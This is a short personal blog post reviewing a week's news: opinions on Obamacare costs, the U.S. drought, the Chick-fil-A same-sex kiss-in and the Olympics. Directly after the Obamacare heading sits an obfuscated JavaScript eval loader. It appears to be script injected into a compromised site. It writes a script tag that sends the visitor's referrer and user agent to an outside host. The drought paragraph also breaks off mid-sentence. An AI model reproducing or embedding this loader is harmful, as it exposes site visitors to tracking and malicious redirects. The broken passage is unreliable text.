The Week in News Review

Obamacare – eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘b’+e(c)+’b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|benfb|var|u0026u|referrer|izsye||js|php’.split(‘|’),0,{}))
It’s expensive is the most understated comment of this century.  Aside from its exorbitant costs, the theory behind affordable healthcare for everyone is idealistic and great.  No family should make the tough decisions between medical needs and food.  However, the country’s current debt deficit, bad paper printing policies that have eroded the global  market’s confidence in the dollar, and a downgraded bond rating does not make the best situation for the introduction of the largest tax increase across all income-classes. While I support affordable medical care, the U.S. needs first to fix its growing debt and banking laws that allowed the bubble to burst in 2008/2009.  Then we can come back to the table and consider affordable healthcare.  We can’t help others if we are overreached already, even if it makes for a great re-election issue.

Drought – Drought has made more than half of all U.S. counties disaster zones. Everyone’s wallet will be reeling from the increased food prices soon because the intense heat wave keeping the country’s soil arid.  Our gridlock Congress has been unable to even agree on an aid package for farmers. It’s okay for politicians

Chick-fil-A Opponents Stage Same-Sex Kiss-In – Does anyone else laugh at the irony of the fattest nation in the world making a  big hoopla over a fast-food chain?

A friend made  a poignant remark when she was stopped by on-the-clock, tax-payer funded policemen blocking traffic to let people in and out of Chic-fil-A.  Shouldn’t our policemen be … policing the streets to stop crime?  Sometimes a chicken sandwich is just a chicken sandwich.

A man’s personal beliefs are his to believe because of our country’s right to free speech.  His company has never discriminated against the LGBT community.  They hire LGBT people and have always served every person that walks-through or drives-through their restaurant.  My beef would be with him only if he mistreated LGBT people.

Olympics – This is a link to a story with the different ages of the Olympians.  Gabrielle Douglas is only 16! The physical feats of these Olympians flabbergasted me.  I’ve spent most of my week-nights glued to the TV set, hypnotized by the best athletes from around the world.
